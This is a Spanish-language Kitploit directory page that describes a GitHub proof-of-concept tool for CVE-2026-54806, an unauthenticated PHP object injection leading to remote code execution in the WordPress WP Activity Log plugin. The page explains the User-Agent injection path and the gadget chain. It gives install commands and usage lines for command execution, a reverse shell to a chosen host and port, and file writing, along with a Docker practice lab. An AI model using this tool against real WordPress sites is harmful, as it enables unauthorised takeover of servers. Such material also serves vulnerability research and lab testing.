Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-54806 — Inyección de objetos PHP no autenticada a RCE en WP Activity Log <= 5.6.3.1 (CVE-2026-54806) | Kitploit
Herramientas/GitHubGitHub/joshuavanderpoll/cve-2026-54806
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de PayloadsLabs y Práctica
GitHubjoshuavanderpoll/cve-2026-54806

CVE-2026-54806

Inyección de objetos PHP no autenticada a RCE en WP Activity Log <= 5.6.3.1 (CVE-2026-54806)

Ver Repositorio
54hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WP Activity Log Inyección de Objetos PHP (CVE-2026-54806) PoC

Python

📜 Descripción

CVE-2026-54806 es una vulnerabilidad crítica (CVSS 9.8) de inyección de objetos PHP sin autenticar en el plugin WP Activity Log de WordPress (wp-security-audit-log) de Melapress. Un atacante no autenticado puede inyectar objetos PHP serializados a través del encabezado User-Agent en cualquier solicitud que desencadene un evento registrado (por ejemplo, un inicio de sesión fallido). La carga útil inyectada se almacena en la base de datos y se deserializa sin restricciones cuando un administrador visita el panel de WordPress, lo que conduce a una ejecución remota de código ciega (sin salida devuelta al atacante).

Plugin afectado: WP Activity Log <= 5.6.3.1 (corregido en 5.6.4)

Requerido para RCE: WordPress 6.4.0 - 6.4.1 — este PoC utiliza el gadget WP_HTML_Token, la única cadena del núcleo de WP con propiedades completamente públicas que sobrevive a sanitize_text_field() y se ajusta al límite de columna de 255 caracteres.

✨ Características

  • Verificación de vulnerabilidad — Detección no destructiva mediante --check
  • Ejecución de comandos — Inyectar comandos mediante --command
  • Reverse shell — Inyectar reverse shell mediante --shell
  • Escritura de archivos — Escribir archivos mediante --write-file
  • No requiere autenticación — Carga útil inyectada mediante User-Agent de inicio de sesión fallido
  • RCE ciega — No se devuelve salida de comandos; use reverse shell o escritura de archivos para interactuar

🛠️ Instalación

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Uso

root@kitploit:~
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>

🐋 Docker PoC

Laboratorio autónomo con WordPress 6.4.1 + WP Activity Log 5.6.3.1. Consulte DOCKER.md para más detalles.

root@kitploit:~
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check

El laboratorio incluye un admin-bot que visita el panel cada 60 segundos, por lo que las cargas útiles inyectadas se activan automáticamente — no se requiere interacción manual.

🕵🏼 Referencias

  • WP Activity Log — Melapress
  • NVD — CVE-2026-54806
  • Patchstack — CVE-2026-54806

📢 Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de investigación. El creador no asume ninguna responsabilidad por el mal uso o daños causados por esta herramienta.

Descargar herramienta